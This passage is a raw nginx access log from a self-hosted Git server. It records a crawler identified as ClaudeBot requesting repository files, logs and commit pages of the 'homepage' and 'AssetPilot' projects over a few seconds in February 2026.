AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf?display=source" [Client 216.73.216.188] [Length 14088] [Gzip 4.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 216.73.216.188] [Length 10753] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt" [Client 216.73.216.188] [Length 9870] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/vite.config.ts" [Client 216.73.216.188] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 15132] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 216.73.216.188] [Length 11965] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf?display=source" [Client 216.73.216.188] [Length 13007] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/index.tsx" [Client 216.73.216.188] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 216.73.216.188] [Length 11028] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js" [Client 216.73.216.188] [Length 10123] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/js/script.js" [Client 216.73.216.188] [Length 4450] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10851] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 216.73.216.188] [Length 12953] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 216.73.216.188] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/package.json?display=source" [Client 216.73.216.188] [Length 11689] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 216.73.216.188] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Hero.tsx" -[15/Feb/2026:13:20:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/components/Footer.tsx" -[15/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Fvite.config.ts" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log" [Client 216.73.216.188] [Length 9935] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 11553] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/3.conf?display=source" [Client 216.73.216.188] [Length 13902] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 15770] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log?display=source" [Client 216.73.216.188] [Length 42685] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 216.73.216.188] [Length 11033] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 216.73.216.188] [Length 11016] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=source" [Client 216.73.216.188] [Length 123712] [Gzip 13.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 216.73.216.188] [Length 12194] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 216.73.216.188] [Length 10932] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5?display=source" [Client 216.73.216.188] [Length 33445] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf?display=source" [Client 216.73.216.188] [Length 11977] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 216.73.216.188] [Length 10977] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log?display=rendered" [Client 216.73.216.188] [Length 10935] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1?display=source" [Client 216.73.216.188] [Length 33639] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 216.73.216.188] [Length 10964] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/2.conf?display=source" [Client 216.73.216.188] [Length 12771] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommits%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.venv%2Fbin%2Fpython3.12" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6?display=source" [Client 216.73.216.188] [Length 35844] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1?display=source" [Client 216.73.216.188] [Length 19907] [Gzip 5.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 248] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx-reverse-proxy.conf?display=rendered" [Client 216.73.216.188] [Length 10904] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 216.73.216.188] [Length 11578] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log?display=source" [Client 216.73.216.188] [Length 25002] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_stream_access.log" [Client 216.73.216.188] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 216.73.216.188] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.csh" [Client 216.73.216.188] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4?display=source" [Client 216.73.216.188] [Length 23736] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 216.73.216.188] [Length 10999] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3?display=source" [Client 216.73.216.188] [Length 38765] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7?display=source" [Client 216.73.216.188] [Length 10974] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip?display=source" [Client 216.73.216.188] [Length 11565] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 10166] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/httpx" [Client 216.73.216.188] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 216.73.216.188] [Length 11232] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 216.73.216.188] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" [Client 216.73.216.188] [Length 48135] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/Dockerfile" [Client 216.73.216.188] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; 